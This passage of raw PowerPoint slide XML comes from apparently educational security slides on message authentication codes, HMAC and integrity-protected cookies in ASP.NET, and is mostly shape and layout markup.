            <a:off x="4144963" y="3182041"/>
            <a:ext cx="3398838" cy="1181100"/>
            <a:chOff x="1651" y="1824"/>
            <a:chExt cx="2141" cy="744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24600" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2EA417-E224-6541-9689-2D8386F3FEDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="1824"/>
              <a:ext cx="192" cy="562"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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24601" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602C39F9-B0C3-B24A-851A-B34549A6F11B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="2400"/>
              <a:ext cx="192" cy="168"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="hlink"/>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24603" name="Line 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B8329C-48EF-4B4F-AAFC-BE41527080E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1651" y="2207"/>
              <a:ext cx="1872" cy="1"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6ED0028-2DDE-814A-A400-2A854AE6C04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7534276" y="2658167"/>
            <a:ext cx="1514475" cy="1704975"/>
            <a:chOff x="3786" y="1494"/>
            <a:chExt cx="954" cy="1074"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24597" name="Freeform 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E87158-F81E-D14B-B402-1EDBC60C6E99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4127" y="1494"/>
              <a:ext cx="613" cy="888"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 613 w 613"/>
                <a:gd name="T1" fmla="*/ 0 h 888"/>
                <a:gd name="T2" fmla="*/ 97 w 613"/>
                <a:gd name="T3" fmla="*/ 438 h 888"/>
                <a:gd name="T4" fmla="*/ 31 w 613"/>
                <a:gd name="T5" fmla="*/ 888 h 888"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 613"/>
                <a:gd name="T10" fmla="*/ 0 h 888"/>
                <a:gd name="T11" fmla="*/ 613 w 613"/>
                <a:gd name="T12" fmla="*/ 888 h 888"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="613" h="888">
                  <a:moveTo>
                    <a:pt x="613" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="528" y="73"/>
                    <a:pt x="194" y="290"/>
                    <a:pt x="97" y="438"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="586"/>
                    <a:pt x="45" y="794"/>
                    <a:pt x="31" y="888"/>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8" name="Freeform 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123FBC29-CF46-DB43-9775-CF26D558F1C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3786" y="2239"/>
              <a:ext cx="276" cy="131"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 276"/>
                <a:gd name="T1" fmla="*/ 29 h 131"/>
                <a:gd name="T2" fmla="*/ 210 w 276"/>
                <a:gd name="T3" fmla="*/ 17 h 131"/>
                <a:gd name="T4" fmla="*/ 276 w 276"/>
                <a:gd name="T5" fmla="*/ 131 h 131"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 276"/>
                <a:gd name="T10" fmla="*/ 0 h 131"/>
                <a:gd name="T11" fmla="*/ 276 w 276"/>
                <a:gd name="T12" fmla="*/ 131 h 131"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="276" h="131">
                  <a:moveTo>
                    <a:pt x="0" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="27"/>
                    <a:pt x="164" y="0"/>
                    <a:pt x="210" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="34"/>
                    <a:pt x="262" y="107"/>
                    <a:pt x="276" y="131"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="28575">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599" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BBE7093-7653-E649-B496-F043784914FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4032" y="2400"/>
              <a:ext cx="192" cy="168"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCCCC"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB4E6066-003C-B743-8B83-A36D0C2AFC1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="3912293"/>
            <a:ext cx="3883025" cy="1474788"/>
            <a:chOff x="3024" y="2284"/>
            <a:chExt cx="2446" cy="929"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24594" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7159C51-154B-9A49-86D2-690091C140F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3792" y="2380"/>
              <a:ext cx="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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24595" name="Text Box 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B28083B2-385D-C547-BEF8-4B29B7A6E3E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3807" y="2284"/>
              <a:ext cx="17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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24596" name="AutoShape 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70184483-2238-394E-8CD3-94C47EE7FA5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3024" y="2845"/>
              <a:ext cx="2446" cy="368"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20625"/>
                <a:gd name="adj2" fmla="val -98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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Recomputes MAC and verifies whether it is</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>equal to the MAC attached to the message</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C81AEC-4812-C94D-AC4E-5A9651C65250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How MACs are Used in the Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B153C4-BFCA-3940-8B8F-9C1ACCEB3F81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7235623" y="1827923"/>
            <a:ext cx="304800" cy="892175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C901D2-15DE-544E-8DFC-39BA4AB26E51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7587705" y="2085703"/>
            <a:ext cx="1348560" cy="924840"/>
            <a:chOff x="7587705" y="2085703"/>
            <a:chExt cx="1348560" cy="924840"/>
          </a:xfrm>
        </p:grpSpPr>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36528180-81CE-7A42-95F9-CAB16CA7FFA1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7587705" y="2085703"/>
                <a:ext cx="178560" cy="680760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="14" name="Ink 13">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36528180-81CE-7A42-95F9-CAB16CA7FFA1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7578705" y="2077063"/>
                  <a:ext cx="196200" cy="698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Ink 14">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7682A2A4-B2F5-3745-9615-48D95A6ED0D4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7620825" y="2765383"/>
                <a:ext cx="90720" cy="21600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="15" name="Ink 14">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7682A2A4-B2F5-3745-9615-48D95A6ED0D4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7612185" y="2756383"/>
                  <a:ext cx="1083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BBBE0298-5831-264B-A251-161627CDB0B1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7604265" y="2682943"/>
                <a:ext cx="1332000" cy="251640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBBE0298-5831-264B-A251-161627CDB0B1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7595265" y="2674303"/>
                  <a:ext cx="13496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08FF5DF8-6886-1C48-8B24-8F6D888B8932}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7626585" y="2934223"/>
                <a:ext cx="102600" cy="76320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="Ink 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08FF5DF8-6886-1C48-8B24-8F6D888B8932}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7617945" y="2925223"/>
                  <a:ext cx="120240" cy="93960"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC66232A-F6CC-8445-AEB0-E11E5C7A705E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3473313" y="4174463"/>
            <a:ext cx="304800" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/>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50" name="Line 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A65B8CDC-4A17-C640-923F-DDB5F4350197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4126268" y="2483538"/>
            <a:ext cx="2800006" cy="995476"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">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1" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D199FEFA-8ADF-9148-A2B3-47657064B920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481596" y="5759174"/>
            <a:ext cx="9228808" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal: prevent malicious user from modifying information stored by server in the user’s browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226810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5603" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37920962-672B-AB48-9D8A-C067C6BB3CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723619" y="891241"/>
            <a:ext cx="3939084" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>HMAC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79" name="Straight Connector 78">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604" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{982B9B25-EE68-D04D-B776-8B2D3855DB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300812" y="891241"/>
            <a:ext cx="5978834" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Construct MAC from a cryptographic hash function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Invented by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Bellare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, Canetti, and Krawczyk (1996)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Used in SSL/TLS, mandatory for IPsec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Why not encryption?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Hashing is faster than encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Library code for hash functions widely available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Can easily replace one hash function with another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>There used to be US export restrictions on encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>More about HMAC later</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2366668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699AB98-D59C-FA40-82E0-6511A9A926D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>How to Do It in ASP.NET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1D5B4D-CBFE-A446-A66E-9085E0C6B942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>System.Web.Configuration.MachineKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Secret Web server key intended for cookie protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Stored on all Web servers in the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Creating an encoded cookie with integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HttpCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
